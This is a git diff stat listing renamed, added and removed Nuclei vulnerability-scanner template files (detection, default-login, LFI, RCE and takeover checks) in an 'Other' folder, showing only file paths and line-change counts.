.../Other/newsletter-open-redirect-9078.yaml | 22 - .../Other/newsletter-open-redirect.yaml | 17 + .../Other/nextcloud-detect-9080.yaml | 25 + nuclei-templates/Other/nextcloud-detect.yaml | 23 - nuclei-templates/Other/nextcloud-install.yaml | 3 +- .../Other/nexus-default-login-9086.yaml | 36 - .../Other/nexus-default-login-9089.yaml | 40 + nuclei-templates/Other/nexus-detect-9094.yaml | 23 + nuclei-templates/Other/nexus-detect-9095.yaml | 23 - .../{nginx-detect.yaml => nginx-Detect.yaml} | 0 nuclei-templates/Other/nginx-config-9098.yaml | 29 + nuclei-templates/Other/nginx-config-9099.yaml | 21 - .../Other/nginx-linux-page-9101.yaml | 20 + nuclei-templates/Other/nginx-linux-page.yaml | 16 - .../Other/nginx-module-vts-xss-9106.yaml | 23 - .../Other/nginx-module-vts-xss-9108.yaml | 28 + .../Other/nginx-proxy-manager-9114.yaml | 26 + .../Other/nginx-proxy-manager.yaml | 29 - nuclei-templates/Other/nginx-status-9115.yaml | 5 +- .../Other/nginx-version-9120.yaml | 25 - nuclei-templates/Other/nginx-version.yaml | 25 + .../Other/nginx_Misconfiguration.yaml | 167 + .../Other/ngrok-takeover-9126.yaml | 17 + nuclei-templates/Other/ngrok-takeover.yaml | 16 - nuclei-templates/Other/nifi-detech-9131.yaml | 25 - nuclei-templates/Other/nifi-detech.yaml | 29 + .../Other/ninjaform-open-redirect-9134.yaml | 27 + .../Other/ninjaform-open-redirect.yaml | 31 - .../Other/node-integration-enabled-9137.yaml | 24 + .../Other/node-integration-enabled.yaml | 17 - .../Other/node-red-detect-9139.yaml | 23 + nuclei-templates/Other/node-red-detect.yaml | 19 - nuclei-templates/Other/npm-log-file-9141.yaml | 22 + nuclei-templates/Other/npm-log-file.yaml | 18 - nuclei-templates/Other/npm.yaml | 23 - .../Other/ns-asg-file-read-9152.yaml | 24 - .../Other/ns-asg-file-read-9153.yaml | 36 + .../Other/ntlm-directories-9156.yaml | 64 - .../Other/ntlm-directories-9157.yaml | 81 + .../Other/nuuno-network-login-9161.yaml | 20 - .../Other/nuuno-network-login-9164.yaml | 19 + .../Other/nuuo-file-inclusion-9169.yaml | 30 - .../Other/nuuo-file-inclusion.yaml | 24 + .../nuuo-nvrmini2-upgradehandlephp-rce.yaml | 4 +- ...aml => oa-tongda-path-traversal-9179.yaml} | 0 .../Other/oa-v9-uploads-file-9189.yaml | 38 + .../Other/oa-v9-uploads-file.yaml | 36 - .../Other/oauth-access-key-9184.yaml | 15 + nuclei-templates/Other/oauth-access-key.yaml | 15 - .../Other/oauth2-detect-9181.yaml | 54 +- ...192.yaml => octobercms-default-login.yaml} | 0 nuclei-templates/Other/octobercms-detect.yaml | 3 +- .../Other/octoprint-login-9197.yaml | 23 + nuclei-templates/Other/octoprint-login.yaml | 19 - ...irect-9201.yaml => odoo-cms-redirect.yaml} | 0 .../Other/odoo-database-manager-9204.yaml | 23 + .../Other/odoo-database-manager.yaml | 23 - .../Other/ofbiz-default-login-9210.yaml | 30 - .../Other/ofbiz-default-login.yaml | 36 + .../Other/office-documents-links.yaml | 27 - .../Other/office365-open-redirect-9212.yaml | 7 +- nuclei-templates/Other/officedocuments.yaml | 24 + nuclei-templates/Other/officeweb365.yaml | 24 + ...oidc-detect-9217.yaml => oidc-detect.yaml} | 0 nuclei-templates/Other/oipm-detect-9221.yaml | 23 - nuclei-templates/Other/oipm-detect.yaml | 14 + nuclei-templates/Other/oki-data-9223.yaml | 19 - nuclei-templates/Other/oki-data-9226.yaml | 23 + .../Other/okiko-sfiler-portal.yaml | 8 +- nuclei-templates/Other/okta-panel-9231.yaml | 26 + nuclei-templates/Other/okta-panel-9234.yaml | 26 - .../Other/old-copyright-9237.yaml | 4 +- .../Other/oliver-library-lfi-9239.yaml | 3 - .../Other/olivetti-crf-detect-9244.yaml | 4 + .../Other/one_line_checks_nuclei.yaml | 30 - .../Other/onliner-multiple-bugs.yaml | 26 + ...=> oob-header-based-interaction-9249.yaml} | 0 .../oob-param-based-interaction-9252.yaml | 22 + .../oob-param-based-interaction-9253.yaml | 19 - .../Other/opcache-status-exposure-9254.yaml | 19 - .../Other/opcache-status-exposure-9255.yaml | 21 + .../Other/open-game-panel-9279.yaml | 23 - nuclei-templates/Other/open-game-panel.yaml | 22 + ...289.yaml => open-proxy-internal-9290.yaml} | 0 .../Other/open-proxy-localhost-9292.yaml | 63 - .../Other/open-proxy-localhost.yaml | 61 + .../Other/open-proxy-portscan-9295.yaml | 62 - .../Other/open-proxy-portscan.yaml | 62 + .../Other/open-redirect-9308.yaml | 116 - .../Other/open-redirect-9312.yaml | 38 + .../open-stack-dashboard-login-9323.yaml | 3 +- ...en-virtualization-manager-detect-9325.yaml | 42 + .../open-virtualization-manager-detect.yaml | 37 - ...pen-virtualization-manager-panel-9327.yaml | 45 + .../open-virtualization-manager-panel.yaml | 33 - .../Other/openam-detection-9257.yaml | 57 +- .../Other/openam-workflow-9258.yaml | 11 + .../Other/openam-workflow-9259.yaml | 11 - nuclei-templates/Other/openapi-2.yaml | 24 - nuclei-templates/Other/openapi.yaml | 33 + .../Other/openbmcs-ssrf-9261.yaml | 28 - nuclei-templates/Other/openbmcs-ssrf.yaml | 27 + .../Other/opencast-detect-9263.yaml | 28 - .../Other/opencast-detect-9265.yaml | 21 + nuclei-templates/Other/opencti-lfi-9268.yaml | 24 + nuclei-templates/Other/opencti-lfi.yaml | 31 - .../Other/openemr-detect-9271.yaml | 25 + .../Other/openemr-detect-9274.yaml | 26 - .../Other/openerp-database-9277.yaml | 18 - nuclei-templates/Other/openerp-database.yaml | 22 + nuclei-templates/Other/openrefine.yaml | 19 + .../Other/opensis-detect-9313.yaml | 24 + .../Other/opensis-detect-9314.yaml | 24 - nuclei-templates/Other/opensis-lfi-9317.yaml | 28 - nuclei-templates/Other/opensis-lfi.yaml | 28 + .../Other/opensis-workflow-9319.yaml | 2 +- nuclei-templates/Other/opensns-rce-9320.yaml | 33 - nuclei-templates/Other/opensns-rce.yaml | 29 + nuclei-templates/Other/openvpn-hhi-9329.yaml | 23 - nuclei-templates/Other/openvpn-hhi.yaml | 23 + nuclei-templates/Other/openweather.yaml | 23 + .../Other/openwrt-login-9333.yaml | 32 + nuclei-templates/Other/openwrt-login.yaml | 27 - ...ml => optilink-ont1gew-gpon-rce-9342.yaml} | 0 ...yaml => oracle-business-control-9346.yaml} | 0 .../Other/oracle-dbass-detect-9350.yaml | 21 + .../Other/oracle-dbass-detect-9351.yaml | 22 - nuclei-templates/Other/oracle-dbcs-9354.yaml | 24 + nuclei-templates/Other/oracle-dbcs-9355.yaml | 20 - ...oracle-ebs-bispgraph-file-access-9356.yaml | 20 - ...oracle-ebs-bispgraph-file-access-9360.yaml | 23 + .../Other/oracle-ebs-credentials-9366.yaml | 33 - .../Other/oracle-ebs-credentials.yaml | 28 + ...=> oracle-ebs-sqllog-disclosure-9370.yaml} | 0 .../Other/oracle-ebs-xss-9376.yaml | 29 + .../Other/oracle-ebs-xss-9377.yaml | 29 - .../Other/oracle-fatwire-lfi-9378.yaml | 22 - .../Other/oracle-fatwire-lfi-9379.yaml | 29 + .../Other/oracle-http-server-12c-9382.yaml | 24 + .../Other/oracle-http-server-12c-9384.yaml | 23 - .../Other/oracle-integrated-manager-9389.yaml | 31 + .../Other/oracle-integrated-manager-9390.yaml | 26 - ...ml => oracle-iplanet-web-server-9392.yaml} | 0 .../Other/oracle-people-enterprise-9394.yaml | 22 - .../Other/oracle-people-enterprise.yaml | 21 + .../Other/oracle-people-sign-in-9399.yaml | 25 - .../Other/oracle-people-sign-in.yaml | 25 + .../Other/oracle-siebel-xss-9400.yaml | 34 + nuclei-templates/Other/oracle-siebel-xss.yaml | 24 - .../Other/oracle-tns-listener.yaml | 32 + .../Other/oracle-tns-listner.yaml | 31 - .../Other/orbiteam-bscw-server-lfi-9404.yaml | 22 - .../Other/orbiteam-bscw-server-lfi.yaml | 28 + nuclei-templates/Other/orchid-store.yaml | 59 + .../Other/oscommerce-rce-9405.yaml | 37 + nuclei-templates/Other/oscommerce-rce.yaml | 31 - .../Other/otobo-open-redirect-9409.yaml | 22 - .../Other/otobo-open-redirect-9410.yaml | 19 + .../Other/owasp-juice-shop-detected-9418.yaml | 21 + .../Other/owasp-juice-shop-detected.yaml | 20 - .../Other/owncloud-config-9420.yaml | 25 - nuclei-templates/Other/owncloud-config.yaml | 21 + nuclei-templates/Other/package-json-9422.yaml | 26 + nuclei-templates/Other/package-json-9423.yaml | 26 - .../pacs-connexion-utilisateur-9426.yaml | 4 + .../Other/pacsone-server-lfi-9428.yaml | 19 + .../Other/pacsone-server-lfi-9429.yaml | 27 - nuclei-templates/Other/pagerduty.yaml | 25 + .../Other/pagespeed-global-admin-9433.yaml | 33 - .../Other/pagespeed-global-admin.yaml | 28 + .../Other/panabit-default-login-9437.yaml | 44 - .../Other/panabit-default-login-9438.yaml | 54 + nuclei-templates/Other/panabit-panalog.yaml | 33 + .../Other/panabit-panel-9444.yaml | 25 + .../Other/panabit-panel-9445.yaml | 24 - .../Other/panabit-sy_addmount-rce.yaml | 24 - ...og-fileread.yaml => panalog-fileRead.yaml} | 0 .../Other/pandora-fms-console-9451.yaml | 21 - .../Other/pandora-fms-console.yaml | 20 + .../Other/panos-default-login-9454.yaml | 34 + .../Other/panos-default-login-9457.yaml | 42 - .../Other/pantheon-takeover-9458.yaml | 18 - .../Other/pantheon-takeover-9459.yaml | 19 + .../Other/parallels-html-client-9462.yaml | 17 - .../Other/parallels-html-client-9464.yaml | 14 + .../Other/parentlink-xss-9466.yaml | 32 + .../Other/parentlink-xss-9467.yaml | 25 - nuclei-templates/Other/path-traversal.yaml | 189 - ...56.yaml => paypal-braintree-token(1).yaml} | 0 .../pbootcms-database-file-download-9469.yaml | 29 - .../pbootcms-database-file-download.yaml | 25 + .../Other/pdf-signer-ssti-to-rce-9471.yaml | 25 + .../Other/pdf-signer-ssti-to-rce.yaml | 22 - ...0.yaml => pentaho-default-login-9478.yaml} | 0 nuclei-templates/Other/perl-status.yaml | 2 +- .../Other/phalcon-framework-source-9494.yaml | 24 + .../Other/phalcon-framework-source-9495.yaml | 21 - .../Other/php-backup-files-9498.yaml | 51 - nuclei-templates/Other/php-backup-files.yaml | 45 + .../Other/php-debug-bar-9506.yaml | 1 - nuclei-templates/Other/php-errors-9511.yaml | 44 - nuclei-templates/Other/php-errors.yaml | 41 + nuclei-templates/Other/php-ini-9524.yaml | 24 - nuclei-templates/Other/php-ini.yaml | 27 + ...tect-1.yaml => php-proxy-detect-9544.yaml} | 0 nuclei-templates/Other/php-scanner-9547.yaml | 2 +- .../Other/php-timeclock-xss-9552.yaml | 31 - nuclei-templates/Other/php-timeclock-xss.yaml | 24 + ...yaml => php-user-ini-disclosure-9561.yaml} | 0 .../Other/php-zerodium-backdoor-rce-9570.yaml | 21 - .../Other/php-zerodium-backdoor-rce-9572.yaml | 26 + nuclei-templates/Other/phpMyAdmin-setup.yaml | 36 - .../Other/phpcollab-workflow-9502.yaml | 11 - .../Other/phpcollab-workflow.yaml | 11 + nuclei-templates/Other/phpinfo-9519.yaml | 44 - nuclei-templates/Other/phpinfo-files.yaml | 51 + .../Other/phpmyadmin-panel-9525.yaml | 30 + .../Other/phpmyadmin-panel-9526.yaml | 35 - .../Other/phpmyadmin-server-import.yaml | 35 - .../Other/phpmyadmin-setup-11857.yaml | 33 + .../Other/phpmyadmin-sql-9535.yaml | 19 +- .../Other/phppgadmin-panel-9543.yaml | 11 +- nuclei-templates/Other/phpunit-9557.yaml | 30 - nuclei-templates/Other/phpunit-9558.yaml | 30 + ...ki-lfi-9566.yaml => phpwiki-lfi-9564.yaml} | 0 .../Other/pi-hole-detect-9582.yaml | 26 + .../Other/pi-hole-detect-9583.yaml | 21 - .../Other/pictatic-api-key-9576.yaml | 16 - nuclei-templates/Other/pictatic-api-key.yaml | 13 + .../Other/pieregister-open-redirect-9577.yaml | 26 + .../Other/pieregister-open-redirect-9578.yaml | 19 - .../pieregister-plugin-open-redirect.yaml | 16 + .../Other/plastic-scm-login-9593.yaml | 20 + nuclei-templates/Other/plastic-scm-login.yaml | 20 - ...ian-9594.yaml => plesk-obsidian-9596.yaml} | 0 nuclei-templates/Other/plesk-onyx-9601.yaml | 19 - nuclei-templates/Other/plesk-onyx-login.yaml | 19 + ...sk-stat-9604.yaml => plesk-stat-9603.yaml} | 0 .../Other/plone-cms-detect-9606.yaml | 26 + nuclei-templates/Other/plone-cms-detect.yaml | 23 - nuclei-templates/Other/pma-server-import.yaml | 35 + .../Other/pmb-directory-traversal-9612.yaml | 22 - .../Other/pmb-directory-traversal-9613.yaml | 29 + .../Other/pmb-local-file-disclosure-9617.yaml | 23 - .../Other/pmb-local-file-disclosure.yaml | 19 + .../Other/pollbot-redirect-9623.yaml | 23 + nuclei-templates/Other/pollbot-redirect.yaml | 23 - ...com-login-9625.yaml => polycom-login.yaml} | 0 .../Other/portainer-init-deploy-9628.yaml | 24 - .../Other/portainer-init-deploy-9633.yaml | 23 + nuclei-templates/Other/postmark.yaml | 26 + .../Other/postmessage-outgoing-tracker.yaml | 7 +- ...ker-9640.yaml => postmessage-tracker.yaml} | 0 .../Other/powercreator-cms-rce-9644.yaml | 37 + .../Other/powercreator-cms-rce-9647.yaml | 42 - .../Other/powerlogic-ion-9650.yaml | 23 + nuclei-templates/Other/powerlogic-ion.yaml | 19 - .../Other/printers-info-leak-9652.yaml | 2 + ...private-key.yaml => private-key-9655.yaml} | 0 .../Other/processmaker-lfi-9662.yaml | 29 + nuclei-templates/Other/processmaker-lfi.yaml | 23 - nuclei-templates/Other/production-logs.yaml | 7 +- .../Other/proftpd-config-9667.yaml | 24 - nuclei-templates/Other/proftpd-config.yaml | 20 + .../Other/project-insight-login.yaml | 5 +- .../Other/prometheus-config-9673.yaml | 30 + nuclei-templates/Other/prometheus-config.yaml | 27 - .../Other/prometheus-exporter-9678.yaml | 30 + .../prometheus-exporter-detect-9676.yaml | 29 + .../Other/prometheus-exporter-detect.yaml | 28 - .../Other/prometheus-exporter.yaml | 25 - .../Other/prometheus-exposed-panel-9684.yaml | 17 + .../Other/prometheus-exposed-panel.yaml | 17 - .../Other/prometheus-flags-9687.yaml | 32 - nuclei-templates/Other/prometheus-flags.yaml | 31 + .../Other/prometheus-targets.yaml | 2 +- .../Other/proposify-takeover-9693.yaml | 16 + .../Other/proposify-takeover.yaml | 18 - nuclei-templates/Other/provider-path.yaml | 4 + ...prtg-detect.yaml => prtg-detect-9706.yaml} | 0 .../Other/public-tomcat-manager-9711.yaml | 10 +- .../Other/pulse-secure-panel-9714.yaml | 20 - .../Other/pulse-secure-panel-9715.yaml | 19 + .../puppet-node-manager-detect-9720.yaml | 24 + .../Other/puppet-node-manager-detect.yaml | 20 - .../Other/puppetdb-detect-9719.yaml | 9 +- ...722.yaml => puppetserver-detect-9721.yaml} | 0 nuclei-templates/Other/put-m-enb.yaml | 22 + .../Other/put-method-enabled-9728.yaml | 24 - .../putty-private-key-disclosure-9730.yaml | 7 +- .../Other/pypicloud-panel-9733.yaml | 6 +- .../Other/pyproject-disclosure-9738.yaml | 4 + .../Other/pyramid-debug-toolbar.yaml | 5 +- .../pyspider-unauthorized-access-9743.yaml | 31 - .../Other/pyspider-unauthorized-access.yaml | 27 + .../Other/python-app-sql-exceptions-9744.yaml | 21 - .../Other/python-app-sql-exceptions.yaml | 20 + ...ics-9745.yaml => python-metrics-9747.yaml} | 0 .../Other/qdpm-info-leak-9753.yaml | 25 + nuclei-templates/Other/qdpm-info-leak.yaml | 25 - ...ang-next-generation-firewall-rce-9759.yaml | 32 - ...ang-next-generation-firewall-rce-9761.yaml | 27 + ...load_all.yaml => qihang-media-upload.yaml} | 0 ...in-byPass.yaml => qizhi-login-bypass.yaml} | 0 .../Other/rabbitmq-dashboard-9778.yaml | 15 - .../Other/rabbitmq-dashboard.yaml | 15 + ....yaml => rabbitmq-default-admin-9780.yaml} | 0 ....yaml => rabbitmq-default-login-9783.yaml} | 0 nuclei-templates/Other/race-multiple.yaml | 23 - nuclei-templates/Other/race-simple.yaml | 46 + .../Other/rack-mini-profiler-9793.yaml | 17 - .../Other/rack-mini-profiler.yaml | 22 + .../Other/radius-manager-9795.yaml | 22 - nuclei-templates/Other/radius-manager.yaml | 23 + ...2.yaml => rails-database-config-9804.yaml} | 0 .../Other/rails-debug-mode-9807.yaml | 17 + nuclei-templates/Other/rails-debug-mode.yaml | 17 - .../rails-secret-token-disclosure-9809.yaml | 3 + nuclei-templates/Other/rails6-xss-9797.yaml | 32 - nuclei-templates/Other/rails6-xss-9800.yaml | 31 + .../Other/rancher-default-login-9815.yaml | 9 +- .../Other/rancher-panel-9817.yaml | 34 + nuclei-templates/Other/rancher-panel.yaml | 29 - .../Other/ranger-default-login-9828.yaml | 39 + .../Other/ranger-default-login.yaml | 39 - .../Other/ranger-detection-9829.yaml | 29 - nuclei-templates/Other/ranger-detection.yaml | 25 + nuclei-templates/Other/raw-get.yaml | 18 + .../Other/rce-cve-2021-41773.yaml | 47 - .../Other/rce-shellshock-user-agent.yaml | 12 +- nuclei-templates/Other/rconfig-rce-9836.yaml | 57 + nuclei-templates/Other/rconfig-rce-9837.yaml | 61 - .../Other/rdf-user-enumeration.yaml | 32 - nuclei-templates/Other/rdp-detect.yaml | 16 +- .../Other/readme-takeover-9841.yaml | 19 - nuclei-templates/Other/readme-takeover.yaml | 15 + .../Other/readthedocs-takeover-9846.yaml | 15 - .../Other/readthedocs-takeover-9847.yaml | 15 + .../Other/readynas_surveillance.yaml | 20 + nuclei-templates/Other/redash-detection.yaml | 23 - nuclei-templates/Other/redash-panel.yaml | 18 + ...or-9849.yaml => redcap-detector-9850.yaml} | 0 .../Other/redmine-cli-detect-9853.yaml | 8 +- nuclei-templates/Other/reflected-headers.yaml | 39 + nuclei-templates/Other/reflected-params.yaml | 354 - .../Other/remote-ui-login-9859.yaml | 3 - ...62.yaml => request-based-interaction.yaml} | 0 .../Other/resin-cnnvd-200705-315-9865.yaml | 25 - .../Other/resin-cnnvd-200705-315-9867.yaml | 26 + ...-lfr-9874.yaml => resin-viewfile-lfr.yaml} | 0 .../Other/robomongo-credential-9884.yaml | 28 - .../Other/robomongo-credential-9885.yaml | 28 + nuclei-templates/Other/robots-txt-9888.yaml | 31 - nuclei-templates/Other/robots-txt.yaml | 28 + ...94.yaml => rocketmq-console-exposure.yaml} | 0 .../Other/rockmongo-default-login-9897.yaml | 37 - .../Other/rockmongo-default-login-9899.yaml | 46 + .../Other/roundcube-log-disclosure-9905.yaml | 26 + .../Other/roundcube-log-disclosure.yaml | 22 - ...os-login.yaml => routeros-login-9909.yaml} | 0 ...ect-9917.yaml => rstudio-detect-9919.yaml} | 0 ...by-on-rails-framework-exceptions-9921.yaml | 7 +- .../Other/ruijie-EG-fileDown.yaml | 24 - .../Other/ruijie-eg-filedown.yaml | 22 + ...9922.yaml => ruijie-eg-password-leak.yaml} | 0 .../Other/ruijie-eg-rce-9926.yaml | 18 +- .../ruijie-information-disclosure-9931.yaml | 22 + .../ruijie-information-disclosure-9932.yaml | 21 - .../Other/ruijie-networks-lfi-9938.yaml | 26 + .../Other/ruijie-networks-lfi-9940.yaml | 27 - .../Other/ruijie-networks-rce-9943.yaml | 31 + .../Other/ruijie-networks-rce-9949.yaml | 38 - .../Other/ruijie-phpinfo-9951.yaml | 21 - nuclei-templates/Other/ruijie-phpinfo.yaml | 22 + nuclei-templates/Other/rusty-joomla-9955.yaml | 46 - nuclei-templates/Other/rusty-joomla.yaml | 38 + .../Other/s3-subtakeover-9967.yaml | 24 + nuclei-templates/Other/s3-subtakeover.yaml | 20 - nuclei-templates/Other/s3cmd-config-9961.yaml | 25 + nuclei-templates/Other/s3cmd-config.yaml | 21 - nuclei-templates/Other/s3hunter.yaml | 3 +- .../Other/saferoads-vms-login-9971.yaml | 18 - .../Other/saferoads-vms-login.yaml | 17 + nuclei-templates/Other/sage-detect-9975.yaml | 24 + nuclei-templates/Other/sage-detect-9977.yaml | 19 - .../Other/salesforce-aura-9981.yaml | 19 + nuclei-templates/Other/salesforce-aura.yaml | 19 - nuclei-templates/Other/samba-config-9987.yaml | 24 - nuclei-templates/Other/samba-config.yaml | 20 + nuclei-templates/Other/samba-detect-9988.yaml | 27 - nuclei-templates/Other/samba-detect.yaml | 27 + ...sung-wlan-ap-default-credentials-9995.yaml | 25 - .../samsung-wlan-ap-default-credentials.yaml | 22 + .../Other/samsung-wlan-ap-lfi-10003.yaml | 22 + .../Other/samsung-wlan-ap-lfi-9999.yaml | 21 - ...04.yaml => samsung-wlan-ap-rce-10007.yaml} | 0 ...ss.yaml => samsung-wlan-ap-xss-10012.yaml} | 0 .../samsung-wlan-default-login-10018.yaml | 38 - .../Other/samsung-wlan-default-login.yaml | 39 + .../Other/sangfor-ba-rce-10021.yaml | 32 - nuclei-templates/Other/sangfor-ba-rce.yaml | 26 + .../Other/sangfor-edr-auth-bypass-10024.yaml | 24 +- .../Other/sangfor-edr-rce-10028.yaml | 25 + .../Other/sangfor-edr-rce-10030.yaml | 34 - .../Other/sap-hana-xsengine-panel.yaml | 2 +- .../Other/sap-igs-detect-10040.yaml | 33 - nuclei-templates/Other/sap-igs-detect.yaml | 39 + .../Other/sap-netweaver-detect-10047.yaml | 30 + .../Other/sap-netweaver-detect.yaml | 26 - .../Other/sap-netweaver-info-leak-10049.yaml | 28 - .../Other/sap-netweaver-info-leak-10051.yaml | 28 + ...l-10055.yaml => sap-netweaver-portal.yaml} | 0 ...ver-rce.yaml => sap-netweaver-rce(1).yaml} | 0 ...i-10058.yaml => sap-netweaver-webgui.yaml} | 0 .../Other/sap-recon-detect-10062.yaml | 36 + .../Other/sap-recon-detect-10063.yaml | 29 - .../Other/sap-redirect-10066.yaml | 22 + nuclei-templates/Other/sap-redirect.yaml | 28 - .../Other/sap-web-dispatcher-10078.yaml | 21 - ...sap-web-dispatcher-admin-portal-10071.yaml | 8 +- .../Other/sap-web-dispatcher.yaml | 19 + ...i-panel.yaml => sapfiori-panel-10033.yaml} | 0 .../Other/sar2html-rce-10081.yaml | 24 + nuclei-templates/Other/sar2html-rce.yaml | 19 - .../Other/sassy-social-share-10086.yaml | 17 - .../Other/sassy-social-share-xss.yaml | 26 + .../Other/sauter-login-10089.yaml | 21 - nuclei-templates/Other/sauter-login.yaml | 20 + ...detect-10094.yaml => sceditor-detect.yaml} | 0 .../Other/scs-landfill-control.yaml | 5 +- nuclei-templates/Other/seacms-rce-10100.yaml | 24 - nuclei-templates/Other/seacms-rce-10101.yaml | 26 + ...{searches (copy 1).yaml => searchbar.yaml} | 0 nuclei-templates/Other/seats-login.yaml | 3 + ...-detect-10112.yaml => secmail-detect.yaml} | 0 ...aml => secnet-ac-default-login-10113.yaml} | 0 .../Other/securenvoy-panel-10114.yaml | 19 + .../Other/securenvoy-panel-10116.yaml | 23 - .../Other/securepoint-utm-10118.yaml | 5 - ...ect.yaml => securityspy-detect-10119.yaml} | 0 .../Other/seeddms-default-login-10127.yaml | 6 +- ...-10135.yaml => selea-ip-camera-10133.yaml} | 0 ...0137.yaml => selenium-exposure-10138.yaml} | 0 ...id-api-11859.yaml => sendgrid-api(1).yaml} | 0 nuclei-templates/Other/sendgrid-api-key.yaml | 2 +- .../sensitive-storage-exposure-10143.yaml | 32 - .../Other/sensitive-storage-exposure.yaml | 30 + .../Other/seowon-router-rce-10147.yaml | 27 - .../Other/seowon-router-rce-10148.yaml | 28 + .../Other/sequoiadb-default-login-10150.yaml | 16 +- ...in-10156.yaml => server-backup-login.yaml} | 0 .../Other/server-backup-manager-se-10159.yaml | 22 + .../Other/server-backup-manager-se-10160.yaml | 23 - .../Other/server-status-localhost-10163.yaml | 28 - .../Other/server-status-localhost-10166.yaml | 28 + .../Other/servfail-refused-hosts-10169.yaml | 23 + .../Other/servfail-refused-hosts-10170.yaml | 17 - nuclei-templates/Other/service-pwd-10176.yaml | 26 - nuclei-templates/Other/service-pwd.yaml | 22 + .../Other/servicedesk-login-panel-10171.yaml | 19 - .../Other/servicedesk-login-panel-10173.yaml | 26 + .../Other/servicenow-helpdesk-credential.yaml | 3 +- .../Other/setup-page-exposure-10180.yaml | 20 + .../Other/setup-page-exposure-10181.yaml | 19 - .../Other/sharecenter-login-10189.yaml | 5 +- .../Other/shell-history-10192.yaml | 51 + nuclei-templates/Other/shell-history.yaml | 46 - ...pped100-sqli.yaml => shipped100-sqli.yaml} | 0 ...n.yaml => shopify-custom-token-10198.yaml} | 0 .../Other/shopify-private-token-11861.yaml | 5 +- .../Other/shopify-shared-secret-11862.yaml | 13 + .../Other/shopify-shared-secret.yaml | 16 - .../Other/shopify-takeover-10203.yaml | 12 +- ...fy-token-10205.yaml => shopify-token.yaml} | 0 .../Other/shoppable-token-10206.yaml | 20 + .../Other/shoppable-token-10208.yaml | 16 - .../Other/shopware-detect-10213.yaml | 28 + nuclei-templates/Other/shopware-detect.yaml | 24 - ...code-lfi.yaml => shortcode-lfi-10215.yaml} | 0 .../Other/shoutcast-server-10217.yaml | 21 - nuclei-templates/Other/shoutcast-server.yaml | 21 + .../Other/showdoc-default-login-10219.yaml | 38 - .../Other/showdoc-default-login-10222.yaml | 40 + .../Other/showdoc-file-upload-rce-10225.yaml | 44 + .../Other/showdoc-file-upload-rce-10229.yaml | 43 - .../Other/sick-beard-xss-10230.yaml | 4 +- .../Other/sidekiq-dashboard-10236.yaml | 5 +- nuclei-templates/Other/signatures-10251.yaml | 21 + nuclei-templates/Other/signatures-10263.yaml | 22 + .../Other/simple-crm-sql-injection-10278.yaml | 1 - .../Other/simple-employee-rce-10280.yaml | 49 + .../Other/simple-employee-rce.yaml | 49 - .../simple-image-manipulator-lfi-10281.yaml | 21 - .../Other/simple-image-manipulator-lfi.yaml | 27 + .../Other/simplebooklet-takeover-10271.yaml | 18 - .../Other/simplebooklet-takeover.yaml | 15 + .../Other/site-map-sql-injection.yaml | 40 - .../Other/sitecore-debug-page-10284.yaml | 20 + .../Other/sitecore-debug-page.yaml | 20 - nuclei-templates/Other/sitecore-login.yaml | 2 +- .../Other/sitecore-version-10292.yaml | 31 + nuclei-templates/Other/sitecore-version.yaml | 25 - .../Other/sitefinity-login-10295.yaml | 23 + .../Other/sitefinity-login-10298.yaml | 22 - .../Other/sitemap-sql-injection.yaml | 21 + .../Other/siteomat-login-10303.yaml | 19 - nuclei-templates/Other/siteomat-login.yaml | 20 + .../Other/skycaiji-admin-panel-10304.yaml | 27 + .../Other/skycaiji-admin-panel.yaml | 27 - .../Other/skycaiji-install-10309.yaml | 11 +- ...udio-lfi-10319.yaml => sl-studio-lfi.yaml} | 0 nuclei-templates/Other/slack-api.yaml | 3 + .../Other/slack-bot-token-10313.yaml | 18 + nuclei-templates/Other/slack-bot-token.yaml | 15 - nuclei-templates/Other/slack-webhook(1).yaml | 13 - .../Other/slack-webhook-11865.yaml | 16 + nuclei-templates/Other/slack.yaml | 25 - .../Other/slocum-login-10316.yaml | 22 - nuclei-templates/Other/slocum-login.yaml | 18 + ...0325.yaml => smartjob-takeover-10322.yaml} | 0 ...326.yaml => smartling-takeover-10327.yaml} | 0 .../Other/smartstore-detect-10333.yaml | 28 - .../Other/smartstore-detect-10334.yaml | 28 + .../Other/smb-v1-detection-10336.yaml | 18 + nuclei-templates/Other/smb-v1-detection.yaml | 19 - .../Other/smugmug-takeover-10340.yaml | 15 + nuclei-templates/Other/smugmug-takeover.yaml | 15 - nuclei-templates/Other/sniplets-lfi.yaml | 12 +- ...plets-xss-10344.yaml => sniplets-xss.yaml} | 0 .../snyk-ignore-file-disclosure-10348.yaml | 7 +- .../sofneta-mecdream-pacs-lfi-10350.yaml | 27 - .../Other/sofneta-mecdream-pacs-lfi.yaml | 30 + .../Other/solarwinds-default-admin-1.yaml | 38 + .../Other/solarwinds-default-admin-2.yaml | 38 - .../Other/solarwinds-default-login-10355.yaml | 37 - .../Other/solarwinds-default-login-10356.yaml | 53 + .../Other/solarwinds-orion-10359.yaml | 7 +- .../solarwinds-servuftp-detect-10360.yaml | 29 + .../Other/solarwinds-servuftp-detect.yaml | 24 - .../Other/solr-exposure-10363.yaml | 28 + .../Other/solr-exposure-10364.yaml | 14 - .../Other/solr-query-dashboard-10367.yaml | 28 - .../Other/solr-query-dashboard-10368.yaml | 25 + nuclei-templates/Other/somfy-login-10371.yaml | 22 - nuclei-templates/Other/somfy-login.yaml | 18 + ...-10374.yaml => sonarqube-login-10376.yaml} | 0 .../Other/sonarqube-public-projects.yaml | 3 +- .../Other/sonarqube-token-10380.yaml | 15 + .../Other/sonarqube-token-10382.yaml | 15 - ...sonicwall-email-security-detect-10384.yaml | 20 + .../sonicwall-email-security-detect.yaml | 17 - .../sonicwall-management-panel-10387.yaml | 17 - .../Other/sonicwall-management-panel.yaml | 15 + .../Other/sonicwall-sslvpn-panel.yaml | 2 +- .../sonicwall-sslvpn-shellshock-10391.yaml | 27 + .../sonicwall-sslvpn-shellshock-10393.yaml | 26 - .../Other/spectracom-default-login-10406.yaml | 45 + .../Other/spectracom-default-login.yaml | 41 - ...er-login.yaml => sphider-login-10410.yaml} | 0 ...spidercontrol-scada-server-info-10413.yaml | 5 +- .../Other/splunk-enterprise-login-panel.yaml | 30 - .../Other/splunk-enterprise-panel.yaml | 31 + .../Other/splunk-login-10416.yaml | 24 + .../Other/splunk-login-10418.yaml | 24 - ...sponip-network-system-ping-rce-10421.yaml} | 0 .../spoofable-spf-records-ptr-10424.yaml | 25 - .../spoofable-spf-records-ptr-10426.yaml | 19 + .../spring-framework-exceptions-10493.yaml | 24 - .../Other/spring-framework-exceptions.yaml | 24 + .../Other/spring-functions-rce.yaml | 46 - 